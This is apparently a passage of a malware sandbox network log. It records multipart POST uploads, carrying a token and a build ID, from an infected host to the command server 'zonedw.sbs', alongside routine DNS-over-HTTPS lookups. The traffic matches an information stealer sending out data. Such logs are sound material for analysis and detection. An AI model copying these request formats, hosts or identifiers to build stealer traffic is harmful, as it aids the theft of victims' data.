2024-12-13 17:58:29 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:29 UTC	11617	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:31 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:58:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:58:31 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
62	192.168.2.7	50268	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:58:30 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----OZUKFK6PZ58YM7QQ1V3O User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 493 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:58:30 UTC	493	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 5a 55 4b 46 4b 36 50 5a 35 38 59 4d 37 51 51 31 56 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 32 64 66 37 30 34 63 33 34 61 63 39 65 32 34 37 34 34 61 38 30 37 34 36 39 36 30 66 63 31 63 0d 0a 2d 2d 2d 2d 2d 2d 4f 5a 55 4b 46 4b 36 50 5a 35 38 59 4d 37 51 51 31 56 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4f 5a 55 4b 46 4b 36 50 5a 35 38 59 4d 37 51 51 31 56 33 4f 0d 0a 43 6f 6e 74 Data Ascii: ------OZUKFK6PZ58YM7QQ1V3OContent-Disposition: form-data; name="token"32df704c34ac9e24744a80746960fc1c------OZUKFK6PZ58YM7QQ1V3OContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------OZUKFK6PZ58YM7QQ1V3OCont
2024-12-13 17:58:31 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:58:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:58:31 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
63	192.168.2.7	50287	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:58:36 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----Y58Q9ZM79H4EU37YUA1D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 3165 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:58:36 UTC	3165	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 59 35 38 51 39 5a 4d 37 39 48 34 45 55 33 37 59 55 41 31 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 32 64 66 37 30 34 63 33 34 61 63 39 65 32 34 37 34 34 61 38 30 37 34 36 39 36 30 66 63 31 63 0d 0a 2d 2d 2d 2d 2d 2d 59 35 38 51 39 5a 4d 37 39 48 34 45 55 33 37 59 55 41 31 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 59 35 38 51 39 5a 4d 37 39 48 34 45 55 33 37 59 55 41 31 44 0d 0a 43 6f 6e 74 Data Ascii: ------Y58Q9ZM79H4EU37YUA1DContent-Disposition: form-data; name="token"32df704c34ac9e24744a80746960fc1c------Y58Q9ZM79H4EU37YUA1DContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------Y58Q9ZM79H4EU37YUA1DCont
2024-12-13 17:58:37 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:58:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:58:37 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
64	192.168.2.7	50291	172.64.41.3	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:58:37 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-12-13 17:58:37 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-12-13 17:58:37 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Fri, 13 Dec 2024 17:58:37 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8f17d7e44af17ca8-EWR alt-svc: h3=":443"; ma=86400
2024-12-13 17:58:37 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 fa 00 04 8e fb 29 03 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom))

Session ID	Source IP	Source Port	Destination IP	Destination Port
65	192.168.2.7	50292	162.159.61.3	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:58:37 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-12-13 17:58:37 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-12-13 17:58:37 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Fri, 13 Dec 2024 17:58:37 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8f17d7e45e8843bb-EWR alt-svc: h3=":443"; ma=86400
2024-12-13 17:58:37 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 e1 00 04 8e fb 28 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom()

Session ID	Source IP	Source Port	Destination IP	Destination Port
66	192.168.2.7	50290	172.64.41.3	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:58:37 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-12-13 17:58:37 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-12-13 17:58:37 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Fri, 13 Dec 2024 17:58:37 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8f17d7e45bcc0c8e-EWR alt-svc: h3=":443"; ma=86400
2024-12-13 17:58:37 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 27 00 04 8e fb 28 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom'(c)

Session ID	Source IP	Source Port	Destination IP	Destination Port
67	192.168.2.7	50300	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:58:37 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----UKX47GDB1DJEUA1NYM79 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 207993 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:58:37 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 55 4b 58 34 37 47 44 42 31 44 4a 45 55 41 31 4e 59 4d 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 32 64 66 37 30 34 63 33 34 61 63 39 65 32 34 37 34 34 61 38 30 37 34 36 39 36 30 66 63 31 63 0d 0a 2d 2d 2d 2d 2d 2d 55 4b 58 34 37 47 44 42 31 44 4a 45 55 41 31 4e 59 4d 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 55 4b 58 34 37 47 44 42 31 44 4a 45 55 41 31 4e 59 4d 37 39 0d 0a 43 6f 6e 74 Data Ascii: ------UKX47GDB1DJEUA1NYM79Content-Disposition: form-data; name="token"32df704c34ac9e24744a80746960fc1c------UKX47GDB1DJEUA1NYM79Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------UKX47GDB1DJEUA1NYM79Cont
2024-12-13 17:58:37 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:37 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:37 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:37 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:37 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:37 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:37 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
